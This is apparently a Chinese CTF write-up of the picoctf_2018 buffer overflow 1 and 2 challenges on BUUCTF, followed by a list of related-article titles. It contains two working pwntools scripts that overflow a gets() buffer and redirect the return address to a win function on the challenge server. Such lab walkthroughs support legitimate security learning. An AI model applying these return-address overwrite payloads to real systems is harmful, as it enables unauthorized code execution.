[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2
picoctf_2018_buffer overflow 1
步驟:
- 例行檢查,32位程式,沒開保護
- 本地執行一下程式,看看程式大概的執行情況
- 32位ida載入,習慣性的檢查程式裡的字串,發現有flag.txt,跟進,找到了讀出flag的函式,win_addr=0x80485CB
- 根據執行時看到的字串找到了輸入點
gets函式讀入,存在溢位漏洞,覆蓋ret為win函式即可
from pwn import *
r=remote('node3.buuoj.cn',27200)
win_addr=0x80485CB
payload='a'*(0x28+4)+p32(win_addr)
r.sendline(payload)
r.interactive()
picoctf_2018_buffer overflow 2
步驟
- 例行檢查,32位程式,開啟了NX保護
- 本地試執行一下程式,看看大概的情況
- 32位ida載入,習慣性的檢索字串,看到了flag.txt,雙擊跟進
跟1差不多,2只是呼叫win函式的時候要滿足a1=0xDEADBEEF,a2=0xDEADC0DE,就可以讀出flag了
from pwn import*
r=remote('node3.buuoj.cn',25010)
payload='a'*(0x6c+4)+p32(0x80485cb)+p32(0)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
r.sendline(payload)
r.interactive()
相關文章
- Pwn buuctf 合集
- BUUCTF PWN 21-40
- BUUCTF pwn學習日記
- Kernel pwn 基礎教程之 Heap Overflow
- buuctf-pwn-get_started_3dsctf_20163D
- [BUUCTF]PWN——babyfengshui_33c3_2016UI
- buuctf-pwn刷題-axb_2019_heap
- NSSCTF_pwn_notepage(1)
- 【PWN】Ret2libc
- Buuctf-Web(1-6)Web
- BUUCTF 4.ciscn_2019_n_1
- BUUCTF1 19-22 wp
- [Black Watch 入群題]PWN 1
- pwn學習-ret2libc
- [原創]pwn棧溢位2
- overflow
- starrycan的pwn學習記錄1
- GUET 2024夢極光pwn2
- 網鼎杯 2024 玄武 pwn2 (kernel)
- stack overflow
- buuctf-web-[極客大挑戰 2019]BuyFlag 1Web
- 如何不使用 overflow: hidden 實現 overflow: hidden
- 【BUUCTF】BabySQliSQL
- 【BUUCTF】AreUSerialz
- 【BUUCTF】HardSQLSQL
- BUUCTF xor
- Linux pwn入門教程(1)——棧溢位基礎Linux
- 【BUUCTF】Easy JavaJava
- 【BUUCTF】easy calc
- BUUCTF reverse 3
- buuctf_misc
- buuctf 逆向 xor
- Understanding Buffer Overflow Bugs
- CSS text-overflowCSS
- CSS overflow-wrapCSS
- NewStarCTF-pwn
- 【Pwn】maze - writrup
- windows pwn(一)Windows